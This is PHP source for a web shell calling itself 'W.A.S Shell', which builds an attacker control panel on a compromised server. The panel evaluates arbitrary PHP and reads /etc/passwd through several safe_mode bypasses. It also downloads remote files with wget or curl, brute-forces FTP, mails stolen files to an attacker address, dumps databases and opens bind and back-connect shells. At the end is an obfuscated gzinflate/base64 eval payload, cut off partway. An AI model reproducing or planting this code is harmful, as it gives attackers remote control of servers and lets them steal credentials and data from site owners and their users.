if(!$safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"was.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$unix&&function_exists('mb_send_mail')){
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_list')){
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_body')){
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
if(!$safe_mode&&$unix){
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo $te.'</div>'.$table_end1.$fe;
if(@function_exists("ftp_connect")){
echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix && @function_exists("ftp_connect")){
echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
echo $te.'</div>'.$table_end1.$fe;
}
if(@function_exists("mail")){
echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from sniper_sa shell"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on) $select .= '<option>PostgreSQL</option>';
if($ora_on) $select .= '<option>Oracle</option>';
$select .= '</select>';
echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
}
if(!$safe_mode&&$unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text214'].$arrow."</b>",in('text','ircadmin',15,'ircadmin'));
echo sr(40,"<b>".$lang[$language.'_text215'].$arrow."</b>",in('text','ircserver',15,'ircserver'));
echo sr(40,"<b>".$lang[$language.'_text216'].$arrow."</b>",in('text','ircchanal',15,'ircchanl'));
echo sr(40,"<b>".$lang[$language.'_text217'].$arrow."</b>",in('text','ircname',15,'ircname'));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ips',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','ports',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe."</tr></div></table>";
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---{ W.A.S Shell }---o</b></font></div></td></tr></table>";
?><?
Did this file decode correctly?
Original Code
<? eval(gzinflate(base64_decode('
7b15Xxs58jj89/D58B6UHnbbnhjjA3PGJGAMMeGK
zZEQ8vW23Y3dwXZ73ebKTN77U1WSutWXwYSZnf09
y0zAlkqlUqlUKpWk0tuNN2+H3eHszFzXMkxWZvqb
V/PzrGraY8tkrQd2nt3MNtj8/MbszJvuuN+jvwCK
fxfc9sgejvHj2B73rA1nfv53UaLRtXo99mN+3nmz
wDMBqm+NDdYdj4fz1r9v7NuyVnEGY2swnj95GFoa
a/NvZW1s3Y8XsLZ11u4aI9cal09PduZXNEACaBon
n/er8LHlmA/s99mZKyg3f2X07d7DGjsxuk7fmJ35
MTszHmHu1lF9u1pfY6bhdqFN+eE9+7VYLK7PzrSd
njNaY7/u7Oys8wLmlAWyY6PVs/JqqRyAb/WM9jVA
bG1WPuzWj04Pt+crR/tHkCtzYjCZYTTr8pssjFRw
QrDFa2x5OGZn1sg0BoaPcndkWQOJczQFzig3sG2T
GZKEa4qG24PhzRhraTkj0xr98ssvakXrMn2eCmLm
r49VwZmzEsecumXyWl2rZ7XHfuPm67Xd9ydrjCOh
JrpOzzb9Np4cHUM2Y79u7+TgJw5kv7qDKCaBbB2d
nBwdrCVXE+TPTzbyptW3x2oPstbNeOwMunan24N/
Y1YACpybMYywibXd2ea4u8aKuX/ECgoMV2NkGYm9
+NQ+27HvLdN9cFnL6ZlKTaurq7ymraPtz1jLL41K
/Wh/f2uzPr+zWakGsTE/8z306j72bICvCkDj/eb2
0XlSbnF7YuHNeh3KJtV9UofWJhXd3qx/iNY9O9M3
Rh17sCZEP9ChLcDfGTk3A1MWkczDod437AFyhiMg
/s8XVpaB9znxb35xVVUA0wxn0iV8kE4iYnZmc61n
D66phwSS8y7MJOvspPrpZH67Wjmqb57Ujg7X2MAZ
WFRoc+3Wdmm2ma5U17m1SL//onBpYgmjPbZvrSmK
vFmQM80bPtOxnjHo3Bgdq3ypfzNuDZ56qQPE1c0A
0DsD1rVNq2natynbTM/OQGWMmU77pg8TW7Zjjas9
Cz9uPdRMhMi644eelTVtd9gzHmD+vdSx+kt9PVCw
7TjXtlW2zdeXejm3Ttk/lErdrnP3U5W2ek77emKt
+WitMDcPOtRYd6zUbF+x1BS1+21OY2kWaAwRZPVc
i2epzF0XfSSMECQOa7ZdUGapueZu9eSL3hvoX9Np
7PK5qyE09MoZWoOUPjRc987Mju/HekYf6Yhq7mqE
+aDFzBTAZq7snuXa360AcBohr9o9x7UQCL8NR1an
2TfG7W7T6PVS+kIq+/pteu1+jf4u6BlAnJmz7oc9
x7SwAOo6qKXdTcnUL/mvzHDZ3I1rjYjWX+B/0IJj
q5/SegM277IFsGmsBYJYGN60ena7iebRAi+kId5f
xBBE48wapbR9p21gL60xLTvXbFTrZ9X6F/34/TF8
3t8BtojpN8yy1uhmbEmuvY0z+xKtuH0xOhRLzhrM
37gaGYuiuGcsLghL8R3bwip3nFEbBvRtPptjC4rN
SNIijL3fhXpEPUZGH2WuDZxR3+iJFOiztTwC8DH+
69XV1bpqIIrpMrM5sqFMRJ/9ChP3OoiU0+u1jBEU
aluehi7m8D8l15tHPZCSif8pIG7XMJ07Lz9fwP+U
/KIZRFA08D8FwBiNlPKrJv6nZI9H0ILk0qYxug6R
IGCk6ZUB3X7dGo37GW4T/e6zZE22WLBmh34mcDPU
A6Cgx3bb6M0b0MbBWt82zR5o9a6FLV7Lr6wzYdv1
rCv4Lo0hj4sye8Th/XzBRZnfcsCo6U8AGDvDGPTA
AW4O/R6d1X5dop915jcJjS1Yj/izNU3pMWsPWS3M
4rJGge0HF+PM2MyMu+z3YOFbYcd5VVBXrwZIyKNd
8IOve1gM1Tn6wXoMb7pD+w5mZYtPbOuMMq9AP7uQ
N993vs8LADGafDBvAcC8FqG9KOwGGlmUpwgM1o5p
kiAJQ2244x0vrTsWaD9okb7dZg1j4LKDhkb5XL8L
BcAY1wVsDIvFsk5rxLbr6jwLVq18ioAfaYUgyLxp
tZ2R0IS8ZUKa2/SDdXjFPEtkypKGtEYmlgNrg4rw
xbTXLrEAn515Zw/sJmpivW/1ndFDs2eD+a5nWD6n
/NBkBfp1AGO1Obb7FvReuQSJ76AoJfByKQ4p1gBl
NtesVz+eVhug4nma/hXzcf5wg9mUxHNx7gtm0mwI
wiAAwO6HGT4IwtN4vjMkSyGQz9NkBR2LcmnuwW+U
jvNSykNeZrqe/l2tTQdzxeh1HXcsbJK3PiPZcGQP
xkx70xpteP/aMBtZ8Pdkc2u/yoj1Zd03d/c3jxvV
NeynnjF0LZ21rV6vMTTa9qBTzgnpr2AvboNCLYvx
TFDHhmkiVInRIqmsL+f+obNWh6DLQoOqGPZxEHgo
eEY5v/FmDOSNTRULtoka4NMPE+/Iuirrb/WN92AS
vFkwNtg885Np9v4n8rHcsh19g222QD7YJLg2ziAA
SbPwREguGBtsF/qAyw1CezxekEQujE38RZ9QhWzQ
aEZLg4kOhx5E8hj2Ku+u2Rm/w/6CTloE9j67j4Ii
BRbgRhN/GP6DnyZTf5osmub/zM5cYrEFAIAPf7A/
EAsHx2/whf9m9B8lU0XwDVgKxf74g6WaaSjXBDgd
sCA8/QeZ/5K/KQfBmU7fZ2ewGODOUt0Ej1jgt1fe
/4/nyP+g3kts7mXzkmG9C380s8pvwuD9FmlM/CON
+WYBWSYk+9fHfwgSpwquR8ugRx8xHhF4I1wMpuxK
JZeDol+4e/Or79/0yiy0qNxTqPLFXX5oJco+rGHu
QSXTcuYHLmdAvSljgQ9BHAzs/5fTwJTKXih49gZW
goxsy7LO+0DnCwxYYfUZLFO6jlnWh1hQahPPMvOt
Qc5P3dNjUP4vUkDPnyVoZtgAe5NYxNaYlF/uTfUt
JJ0NjD5+5p3B0Iws6/klnd0avRsLOkSwOcSfGBt/
PWDEkQ0HTFsYbqhjB74CaTH98tdxtvQ8zuK6lEiE
OTgiU8DsUxgOyEveTN4F/PcwFv5YjBAVfoFqoA+k
G+hzXHHPowprP7esF3KyH/mgREZhciki1wVlDbSN
/61PWCZIe7aSw//0Da4FgDhR+0RKfA3wJ1GTLxSx
Dhju8Bu+zM7k4Pdiacn7sOx/WlE+rqqfc7MzspRX
yC+jFAmUoB9AQz+zMwX6mZ3hDtHZmUX6mZ0p0c/s
DJel2Zll+pmdWaGf2ZlV+onig7qoQVAhUQa1ShqK
hTylL5UAP/yi78vyw4r3adX/mFM+G2bfHhBu+EVf
/DSFCSKHvoiS+FngaLVN64r+wv+zM6/e/Qr/09+5
f/yf/PvP31L849yv714pMiMGOvxmLNHogfFxROrf
Jd3lDo2B1F1cusTkILSU3gYAq+fJV2A1uQyyAzLY
tdrXsHTjqm9kmGT9to+xHFY4AfnVeDgJcxAjAMMc
tcECmlbMpBIhd6GJymSe1I0RA0FNwYlrw9MIMPNZ
V2OdTAhlgeP5X4GWJrU7NYezY4bGb4Zm68ycsAlo
Km13YRpt34x6TbAtuBlC38BUAF6kID/DKqf1/aPj
kyb8yTANUK8tLBBabSJ4vXpyWj88qW8eNnaqdTBS
JkK/Pzk53jw9ec9T8FNza7NRq0wstHNyvF9rnBwd
7n9+DP9po1o/Pt+GBhAv1ogX4QawYJnK0eFhtXJy
UjuoHp2eZJjHuYk0bdb2jw6r9fqRbPOcaYwNyWbr
3mpjgbRwSovU0WjgUDKaOYUVRj5Wz57BGb06Gjkj
GBMVbtlhLyM5JjpxWIb1jWsLnatXtmkN2hYzaHUH
Ymeb5HBgzhUTE/ornHhQctDyXCfXMDc846nJ0VoM
c6nTyQ7z7S7uQievStkTDp/D71QXM//b3NzerpNx
94P8948jwIoC9h2ue0NmP/d3S2sHViNRALJVJcAX
fyFLlcMch39okftVGvva+g9iiPDrY68Ru/x9DtI+
f9ZQQ0+6HGtrhdxK4T8+4P77RhH7qwbRSw0h2elP
GUNZjYtF/FiKx4RVquX+NoMKlnpiu4lPjGn2z3+y
V1Z/OH7wktKkFYmqno2MZGKnjKW0y4EGXSjWq2m5
OE0CI7r5Np1s/Rex5P/6K9scj8EahcUDy2azIQ8A
b4O3WQd96pET2KubaxLzymw8svscKB0o5pGHxaTR
zERZsbDmZWVmWqyI5aKZK0wNuaLM+FxCM7z+DEeV
CXsElE0+FR1XaBrfsA1qt2nQ/ggKFvlzFPbugAak
nYIod4VMek6RH9648p0ifKmDrbbaXYf9F7kHSWEg
zfqb4QZ3RpAtqOFHjRmkksqaJl0UGrootMDinY7A
abKY3bM0vnTXSjlNmJnagjVuL/Dd6VBhPo5k8a4B
qzTk1nevKHpwX2nS4NRp/xsqIQfN8RF6Z/Ar9930
rFurV85xoXyF6aCYQaDdFBG2pqXFvv27/rVpj7xU
9EW1u6EUju31a/Lxz3mUQcXvxOBNaQsajFws4m2X
p+YMIGDOeNOGhSOoDq9cGhJfvybHGcODBympSTyI
L3PG17QEkEBqI8KgzAdVGhWCWveBRBuTAZQm41c+
aO66QEKKZ83Pp5lgVDbLufQMgx1ZTL8WFhZgApD8
e6odwWffkeXe9MZx868YgyF3QDEnV/959Ay84PKf
0SgSqkuSVWY7m/uNKvbR78y0QVZ2DGin+Qq4xvzZ
kfFijx/N4Hj94xlpfpp04vEMYgR9yeIsg7OaVy/P
41jXeUdzPcCUBTJ83jk6PKFRF54ipTbV5eJQX1e1
JEiQogt9L5t0QNO8jUcWysJnx5XGfIFrZjltxx8I
yWobeD5PmcalzoaKPCMoxQflD3Um55t3poU185Mj
nBF44mNdUIyFlMMfv4pp4lcwN263bno9a2wP2Dah
CB/+iNnw5WeI8upZLrkjz0+rUX6B8gOb7PycwsRS
RSpFO7n83ALj7FVhFpMxB/asg+deRDfhUZoCa/dA
c5d13hD9EYZ0C7y7bbPcNVpgh4DJwbsePQQbAYc3
6m85x+i66qDk9Ydr/ueg5Q7X0TuB546oGhWiiCh+
+eUN+mgCGQXcgnTH0nvjy55OrNCFAanjGQD40TfW
pEBFUHlU/MzvgEsGu49Pf2arK2Y9zxaXXvASeWWI
